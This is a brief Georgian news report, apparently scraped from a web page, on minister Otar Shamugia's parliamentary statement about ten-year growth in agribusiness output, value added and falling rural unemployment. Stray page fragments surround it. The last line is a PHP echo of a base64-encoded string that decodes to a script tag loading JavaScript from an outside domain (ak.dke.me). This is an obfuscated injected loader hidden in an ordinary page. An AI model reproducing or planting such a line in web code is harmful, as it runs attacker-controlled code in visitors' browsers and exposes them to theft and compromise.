celsiusi
ავერსი საქკაბელი

უკანასკნელი 10 წლის განმავლობაში, აგრობიზნესის პროდუქციის გამოშვების მაჩვენებელი გაზრდილია 112%-ით - განაცხადა გარემოს დაცვისა და სოფლის მეურნეობის მინისტრმა ოთარ შამუგიამ საქართველოს პარლამენტში, „მინისტრის საათის“ ფორმატში სიტყვით გამოსვლისას. 

"უკანასკნელი 10 წლის განმავლობაში, აგრობიზნესის პროდუქციის (პირველადი და გადამუშავებული პროდუქცია) გამოშვების მაჩვენებელი გაზრდილია 112%-ით, ხოლო 2021 წელთან შედარებით, გვაქვს 14%-იანი ზრდა. ასევე, ბოლო 10 წლის განმავლობაში, 96%-ით არის გაზრდილი და 4.4 მილიარდ ლარს შეადგენს დარგში შექმნილი დამატებული ღირებულება; 2021 წელს თუ შევადარებთ, 13%-იანი ზრდა ფიქსირდება.

ამავე დროს, ბოლო 10 წლის განმავლობაში, სოფლად 6.7 პროცენტული პუნქტით შემცირდა უმუშევრობის დონე და, 2022 წელს, 15.7 პროცენტი შეადგინა (გასულ წელთან შედარებით, შემცირებულია 2.5 პროცენტული პუნქტით)." - აღნიშნული სტატისტიკა ოთარ შამუგიამ, საქართველოს პარლამენტში, „მინისტრის საათის“ ფორმატში სიტყვით გამოსვლისას წარმოადგინა.
279
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");